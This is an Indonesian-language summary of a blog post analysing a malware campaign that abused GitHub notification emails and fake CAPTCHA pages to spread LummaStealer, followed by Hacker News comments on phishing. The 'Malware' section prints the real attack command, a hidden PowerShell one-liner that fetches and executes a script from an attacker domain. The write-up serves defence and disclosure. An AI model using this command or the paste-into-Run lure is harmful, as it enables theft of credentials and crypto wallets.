Insiden Distribusi Malware yang Menyalahgunakan Email Notifikasi GitHub

 (ianspence.com)
1 poin oleh GN⁺ 2024-09-20 | 1 komentar | Bagikan ke WhatsApp
  • Sebagai pengembang open source, sering menerima email dari GitHub
  • Sebagian besar email adalah email notifikasi yang memberi tahu tentang interaksi pengguna GitHub
  • Namun, beberapa email menyamar sebagai keamanan GitHub untuk membuat pengguna mengunduh malware

Metode serangan

  1. Penyerang menggunakan akun GitHub sementara untuk membuat issue di repositori publik
  2. Penyerang dengan cepat menghapus issue tersebut
  3. Pemilik repositori menerima email notifikasi
  4. Mengklik tautan di dalam email
  5. Mengikuti instruksi hingga sistem terinfeksi malware

Analisis pesan email

  • Isi email sebagian besar dapat dikendalikan oleh penyerang
  • Email tidak menyebutkan bahwa issue baru telah dibuat
  • Penyerang menyamar sebagai "Github Security Team"
  • Karena email benar-benar dikirim dari GitHub, email tersebut lolos pemeriksaan phishing

Hal yang perlu diperbaiki di GitHub

  • Menyediakan lebih banyak konteks di email dapat mengurangi efektivitas serangan
  • Konten yang dapat dikendalikan penyerang harus dikurangi, dan kejelasan tentang pengirim perlu ditingkatkan

Situs web

  • Mengikuti tautan dalam email akan membawa pengguna ke halaman CAPTCHA
  • Halaman CAPTCHA menggiring pengguna untuk memasukkan perintah ke kotak Run Windows

Malware

  • Situs menyalin perintah berikut ke clipboard: 
    powershell.exe -w hidden -Command "iex (iwr '[https://]2x[.]si/DR1.txt').Content"
  • Perintah ini menjalankan proses PowerShell lalu mengunduh dan mengeksekusi skrip

Tahapan malware

  1. Skrip diunduh dan dijalankan melalui perintah PowerShell
  2. Skrip mengunduh dan menjalankan file executable berbahaya
  3. File executable memiliki tanda tangan digital, tetapi tidak valid
  4. Windows tidak memberikan peringatan untuk tanda tangan yang tidak valid

Kelemahan Windows

  • Flag "Mark of the Web" (MOTW) yang mengidentifikasi file yang diunduh dari internet tidak disetel
  • Kelas System.Net.WebClient di .NET Framework tidak menyetel flag MOTW
  • Jika flag MOTW tidak disetel, Windows tidak memperingatkan tentang tanda tangan yang tidak valid

Analisis malware

  • Malware dimuat ke memori dan dijalankan
  • Malware tersebut adalah LummaStealer, yang mencuri wallet kripto, kredensial yang tersimpan, dan lainnya

Kesimpulan

  • Contoh serangan yang mengeksploitasi kelemahan email notifikasi GitHub
  • Analisis dilakukan dengan menggunakan berbagai alat

Ringkasan GN⁺

  • Artikel ini membahas kasus serangan malware yang mengeksploitasi email notifikasi GitHub
  • Malware didistribusikan dengan memanfaatkan kelemahan pada sistem email GitHub
  • Serangan ini memanfaatkan kelemahan pada flag "Mark of the Web" di Windows dan verifikasi tanda tangan digital
  • Malware yang digunakan adalah LummaStealer
  • Kelemahan-kelemahan ini telah dilaporkan ke GitHub dan Microsoft
  • Untuk proyek lain dengan fungsi serupa, materi analisis dari Cyfirma direkomendasikan

Bacaan terkait

1 komentar

 
GN⁺ 2024-09-20
Komentar Hacker News

  • Baru-baru ini menerima email yang sangat meyakinkan dari PayPal

    • Seseorang menggunakan fitur kutipan untuk menetapkan nama perusahaan menjadi "PayPal need to get in touch about a your recent payment of $499.00, please call +1-...."
    • Email tersebut benar-benar berasal dari PayPal.com, dan sulit dipahami mengapa mereka tidak mengelola nama pengguna seperti ini
    • Sudah melaporkannya, tetapi belum menerima balasan
    • Email ini diformat agar terlihat seperti email PayPal asli, jadi sepertinya banyak orang akan tertipu

  • Penasaran apakah orang benar-benar tertipu oleh penipuan seperti ini

    • Dengan asumsi mereka tahu bahwa email itu berasal dari GitHub
    • Tanda bahaya pertama: email menaut ke variasi dari domain yang sebenarnya
    • Tanda bahaya kedua: captcha meminta pengguna mengetik perintah shell

  • Sepertinya developer junior bisa tertipu oleh penipuan seperti ini

    • "Oh, menarik juga ya, menyelesaikan captcha dengan menjalankan kode!"

  • Halaman web seharusnya tidak boleh bisa mengisi buffer salin/tempel hanya dengan klik

    • Jangan mengklik tautan di email atau mempercayai isi email
    • Masalahnya adalah Windows masih mengizinkan hak akses root hanya dengan satu baris perintah PowerShell

  • GitHub harus mencegah layanan otomatis menaruh tautan di issue tanpa memeriksa tautannya

    • GitHub perlu mengelola konten yang dikirim lewat email dengan lebih baik

  • Penasaran apakah github-scanner.com masih merupakan pihak jahat

    • Cloudflare meng-host DNS-nya, tetapi tidak ada cara untuk melaporkan masalah ini

  • Penyerang dengan cepat menghapus issue tersebut

    • Hanya admin yang bisa menghapus issue
    • Karena itu, jejak issue itu tetap tertinggal di repositori

  • Tulisan yang bagus, terasa mirip dengan blog Julia Evans

  • Menyedihkan bahwa bahkan pada 2024 masih ada orang yang tertipu oleh trik paling sederhana

  • Tadi pagi menerima notifikasi seperti ini dan mengabaikannya

    • Notifikasi itu terkait repositori tertentu

  • Layak dibaca, menunjukkan apa yang mereka coba lakukan

    • Hanya dari tautannya saja sudah terasa mencurigakan, tetapi menarik melihat seseorang membongkar ini

  • Pernah menerima email notifikasi GitHub yang mirip

    • Katanya ada kerentanan yang ditemukan di repositori, tetapi saya tidak mengkliknya
    • Saya programmer yang malas, jadi saya tidak mengkliknya